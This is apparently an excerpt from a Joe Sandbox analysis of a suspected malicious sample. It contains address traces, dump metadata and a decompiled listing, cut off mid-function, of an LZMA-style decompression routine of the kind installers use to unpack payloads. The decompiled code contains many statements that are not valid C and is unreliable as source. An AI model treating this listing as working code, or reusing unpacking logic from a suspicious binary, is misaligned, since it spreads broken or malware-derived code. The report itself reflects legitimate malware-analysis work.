0x0040660d
0x0040660d
0x0040660d
0x00406610
0x00406613
0x00406613
0x00406619
0x004065b7
0x004065b7
0x004065ba
0x00000000
0x004065ba
0x0040661b
0x0040661b
0x0040661e
0x00406621
0x00406624
0x00406627
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406636
0x00406639
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665a
0x0040665d
0x00406661
0x00406663
0x0040663b
0x0040663b
0x00406643
0x00406648
0x0040664a
0x0040664c
0x0040664c
0x00406666
0x0040666d
0x00406670
0x00000000
0x00406672
0x00000000
0x00406672
0x00000000
0x004068ff
0x004068ff
0x00406903
0x00406c2a
0x00000000
0x00406c2a
0x00406909
0x0040690c
0x0040690f
0x00406913
0x00406916
0x0040691c
0x0040691e
0x0040691e
0x0040691e
0x00406921
0x00000000
0x00000000
0x004066cf
0x004066cf
0x004066d2
0x00406a44
0x00406a44
0x00000000
0x00000000
0x00000000
0x00000000
0x00406acb
0x00406acf
0x00406aed
0x00406aed
0x00406aed
0x00406af4
0x00406afb
0x00000000
0x00406afb
0x00406ad1
0x00406ad4
0x00406ad7
0x00406ada
0x00406ae1
0x00000000
0x00000000
0x00406bbc
0x00406bbf
0x00406ac0
0x00406ac0
0x00000000
0x00000000
0x004067f6
0x004067f8
0x004067ff
0x00406800
0x00406802
0x00406805
0x00000000
0x00000000
0x0040680d
0x00406810
0x00406813
0x00406815
0x00406817
0x00406817
0x00406818
0x0040681b
0x00406822
0x00406825
0x00406833
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b18
0x00406b18
0x00406b1c
0x00406c54
0x00000000
0x00406c54
0x00406b22
0x00406b25
0x00406b28
0x00406b2c
0x00406b2f
0x00406b35
0x00406b37
0x00406b37
0x00406b37
0x00406b3a
0x00406b3d
0x00406b3d
0x00406b3d
0x00406b3d
0x00000000
0x00000000
0x0040683b
0x0040683e
0x00406874
0x004069a4
0x004069a4
0x004069a4
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ac
0x00406c36
0x00000000
0x00406c36
0x004069b2
0x004069b5
0x00000000
0x00000000
0x004069bb
0x004069bf
0x004069c2
0x004069c2
0x004069c2
0x00000000
0x004069c2
0x00406840
0x00406842
0x00406844
0x00406846
0x00406849
0x0040684a
0x0040684c
0x0040684e
0x00406851
0x00406854
0x0040686a
0x0040686f
0x004068a7
0x004068a7
0x004068ab
0x004068d7
0x004068d9
0x004068e0
0x004068e3
0x004068e6
0x004068e6
0x004068eb
0x004068eb
0x004068ed
0x004068f0
0x004068f7
0x004068fa
0x00406927
0x00406927
0x0040692a
0x0040692d
0x004069a1
0x004069a1
0x004069a1
0x00000000
0x004069a1
0x0040692f
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x0040694d
0x00406950
0x00406969
0x0040696b
0x0040696e
0x0040696f
0x00406972
0x00406974
0x00406977
0x00406979
0x0040697b
0x0040697e
0x00406980
0x00406983
0x00406987
0x00406989
0x00406989
0x0040698a
0x0040698d
0x00406990
0x00406952
0x00406952
0x0040695a
0x0040695f
0x00406961
0x00406964
0x00406964
0x00406993
0x0040699a
0x00406924
0x00406924
0x00406924
0x00406924
0x00000000
0x0040699c
0x00000000
0x0040699c
0x0040699a
0x004068ad
0x004068b0
0x004068b2
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068c0
0x004068c3
0x004068c3
0x004068c6
0x004068c6
0x004068c9
0x004068d0
0x004068a4
0x004068a4
0x004068a4
0x004068a4
0x00000000
0x004068d2
0x00000000
0x004068d2
0x004068d0
0x00406856
0x00406859
0x0040685b
0x0040685e
0x00000000
0x00000000
0x004065bd
0x004065bd
0x004065c1
0x00406c06
0x00000000
0x00406c06
0x004065c7
0x004065ca
0x004065cd
0x004065d0
0x004065d3
0x004065d6
0x004065d9
0x004065db
0x004065de
0x004065e1
0x004065e4
0x004065e6
0x004065e6
0x004065e6
0x00000000
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406c12
0x00000000
0x00406c12
0x00406752
0x00406755
0x00406758
0x0040675b
0x0040675d
0x0040675d
0x0040675d
0x00406760
0x00406763
0x00406766
0x00406769
0x0040676c
0x0040676f
0x00406770
0x00406772
0x00406772
0x00406772
0x00406775
0x00406778
0x0040677b
0x0040677e
0x0040677e
0x0040677e
0x00406781
0x00406783
0x00406783
0x00000000
0x00000000
0x004069c5
0x004069c5
0x004069c5
0x004069c9
0x00000000
0x00000000
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069da
0x004069da
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069ec
0x004069ed
0x004069ef
0x004069ef
0x004069ef
0x004069f2
0x004069f5
0x004069f8
0x004069fb
0x004069fe
0x00406a02
0x00406a04
0x00406a07
0x00000000
0x00406a09
0x00406786
0x00406786
0x00000000
0x00406786
0x00406a07
0x00406c3c
0x00406c5e
0x00406c64
0x00406c66
0x00406c6d
0x00406c6f
0x00406c76
0x00406c7a
0x00000000
0x0040626b
0x00406c73
0x00406c73
0x00000000
0x00406c73
0x00406ac0
0x00406b46
0x00406b4c
0x00406b4f
0x00406b52
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b61
0x00406b67
0x00406b80
0x00406b83
0x00406b86
0x00406b89
0x00406b8d
0x00406b8f
0x00406b90
0x00406b93
0x00406b69
0x00406b69
0x00406b71
0x00406b76
0x00406b78
0x00406b7b
0x00406b7b
0x00406b9d
0x00000000
0x00406b9f
0x00000000
0x00406b9f
0x00406b9d
0x00000000
0x00406a12

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6b2e0f52810d9ee71d77bfe2573954e40a6d8ea3dc4654046182b0aba701b63
Instruction ID: 88bd556f53b16bba3b39c1042d046f8dabd274857e068f98c0d3b031c9f779c2
Opcode Fuzzy Hash: d6b2e0f52810d9ee71d77bfe2573954e40a6d8ea3dc4654046182b0aba701b63
Instruction Fuzzy Hash: 58913470D04268CBEF28CF98C854BADBBB1FF44305F15816AD856BB291C3786996DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406724 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406724() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406C7B))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4)); // executed
							}
							_t535 = GlobalAlloc("true", 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc("true",  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
